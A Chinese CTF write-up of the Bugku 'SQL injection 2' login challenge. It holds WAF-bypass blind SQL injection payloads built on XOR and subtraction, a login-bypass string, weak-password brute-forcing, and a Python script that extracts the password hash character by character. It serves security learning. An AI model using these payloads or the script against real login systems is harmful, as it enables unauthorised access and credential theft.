bugku-sql注入2（学习到有用的东西）

这道题只能说坑啊，特别是最后找密码参数那里，真的是磕磕碰碰啊。。。

但是做完题的整个过程还是学到了很多有用的技巧。

直接来吧：

看了下提示，真的是全都过滤了吗，点进去是一个登录页面

哎，又是一个post型注入，先试试随便输个账号密码看看回显

没有说密码错误，那么应该是先判断用户名再判断密码的，盲猜用户名为admin，试试

那么用户名确实是admin，先抓包，对用户名处进行操作，输入单引号没反应，然后跟上注释符#，发现被waf拦截！

看看提示的那些符号被过滤没，拿一个逗号试试，不行，再%试试，发现没被过滤，原来这全部过滤是骗人的，waf只拦截了一部分。

我的wfuzz暂时出了点问题，这里就先用我自己归纳的sql注入常用的关键字和字符字典，可以拿来用bp跑，看哪些字符没被过滤，还是挺有用的。

扫完之后发现，长度为367的字符（除了第一个）没有被waf拦截的，而370的是被waf拦截了的。注意，这里是waf过滤，不是普通的函数过滤，因此双写绕过没用，试了大小写绕过也没用，因此哪些关键字被过滤了的话，就不能用了，url全编码两次也不行。

一、方法一：

注释符也过滤完了，and和or也被过滤掉，因此这里用不了一般的闭合了，看着异或符^还没有被过滤，那么试试用异或逻辑来判断真假。

盲猜后端sql语句为“select * from user where uname='xxxxxxx';”

不为难我们的话一般都为单引号闭合，那么在uname上构造这样的payload:admin'^(length(database())>1)^'

如果我们中间的sql语句为假则返回真，为真则返回假，我们拿0和1来测试一下返回状态：

我们条件为0（假），返回结果为密码错误（说明用户名正确）；条件为1（真），返回结果为用户名错误（即为假）。

那么直接爆数据库长度，先试着用bp来爆，发现不管返回是密码错误还是用户名错误，长度都是一样的，选择了先手爆数据库长度，然后再用脚本跑库名。

前面两个返回的都是用户名错误，大于三就密码错误了，说明数据库长度为3.

然后我们用substrl（）函数构造爆数据库字母的语句，这里由于逗号被过滤了，那么我们用from...for...来代替

substr(database(),,)等价于substr(database() from  for )

哦豁，忘了刚刚空格和or都被过滤了，导致for也用不了了，那么只能用如下payload了

ascii(substr((database())from()))=

空格用（）代替，至于只用from就能达到目的的原理等稍后解释。

用脚本爆出来为“ctf”，但是我发现，这。。。。没用啊啊啊！，后面根本爆不了表跟字段，or都被waf过滤了，跟or相关的关键字也都被间接过滤（比如说information），玩个蛇，不会直接爆破吧这玩意儿，反正都知道了用户名，说不定密码是个弱密码呢。

然后直接拿出我自己平常收集的一个弱密码字典来试试，因为手懒，就把平常自己能想到和用到的弱密码收集在了一起，特别小，方便bp跑。

看了一下367的响应包，是密码错误的，看了下320的响应包，没有数据，而且自从密码为admin123之后全是320的，回去试试第一个密码admin123，发现页面自己变成了http://123.206.87.240:8007/web2/admin/，直接是登录的状态了

我知道了，只要bp扫到正确的密码并且发包之后，原来的页面直接更换为已登录状态，那么换个浏览器去试试密码。

我先试了admin123下面的任意一个密码，不行，然后试admin123，发现确实能登录，直接ls，得到flag

方法二

看了其他大佬的wp，发现一个坑人的地方，直接看源码，

name对应的就是密码的参数名，直接用刚刚的盲注来爆这个参数passwd。

32以下的数字都是对的，大于32就错误了（注意这里用户名正确代表sql语句为假），因此passwd为32位，应该是个32位加密的md5值。

然后用我刚才写的脚本，修改一些变量值就可以爆出32位的md5值了，脚本最后贴出。

然后拿去在线cmd5里面去解

得到密码。然后登录得flag。

原理：

0x01 只用from的substr查询

我们在自己本机的mysql里面做实验，

发现只用from的话，就会把对应查询位置的字符以及后面的字符全部查询显示出来，相当于默认长度为后面所有。

发现只要用ascii码做比较，只会比较查询出来的第一个字母的ascii码，也就是说我们只用from还是能达到一个字母一个字母通过盲注比较出来并拼接。

0x02 sql语句的数学计算

sql语句进行计算的时候，会把字符串转化为整数来计算，如果字符串开头不是数字的话直接转化为0

我们先来看看查询一个表时where条件直接跟一个字段等于0

发现只要user字段内容的首位不为数字的全都查询出来了，因为user=0这个“=”也是一个数学计算符，因此会将user字段的所有内容转化为数字型，首字母不为数字的字符串全部转化为0，而从首字母开始如果是数字，将会转话为最前面对应的数字（例如‘123admin’将转为123），因此符合user等于0的就是那些首字母不为数字的用户了，全部爆出来。

如果等于1或其他数字就不会爆出来。

那么我们在user后面也可构造一个字符和数字的计算试，让其结果为0即可查询到所有。因此我们构造

'a'-()-''  条件为真
'a'-()-''  条件为假

括号里面的是条件，可以是sql判断条件，是真返回数字1，是假返回数字0.

这里出现了减号，那么这个式子会被当成这样计算，有引号的字符串全部转化为0

'a'-()-''  计算结果为：--=-
'a'-()-''  计算结果为：--=

因此当条件为假的时候结果为零，数据库将查询到全部数据。

同理上面的异或payload可以这样计算：

'a'^()^''  计算结果为：^^=
'a'^()^''  计算结果为：^^=

同样是括号内的sql语句为真时返回1，为假时返回0，因此利用这两种状态来判断是真是假。

0x03 可当万能密码使用

如果后台查询为单引号情况下：

a'^(0)^'
或者
a'-(0)-'

当然，不一定能绕过密码有时候。

附上本题跑密码的脚本：

import requests

hed={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'}
admin="admin'-(ascii(substr((passwd)from({})))={})-'"
#dat={'uname':admin,'passwd':'123'}
url="http://123.206.87.240:8007/web2/login.php"
ascil=[i for i in range(48,58)]
ascil2=[i for i in range(97,123)]
ascil3=ascil+ascil2
password=''
for i in range(1,33):
    for j in ascil3:
        dat={'uname':admin.format(i,j),'passwd':''}
        respons=requests.post(url,headers=hed,data=dat,timeout=4)
        html=respons.content.decode()
        if 'username' in html:
            password=password+chr(j)
            print(password)
            break
print('密码的md5为：',password)

总的来说，数学计算符号可以在sql中搭配逻辑判断灵活使用，这里还可以用其他计算符同样可以达到目的。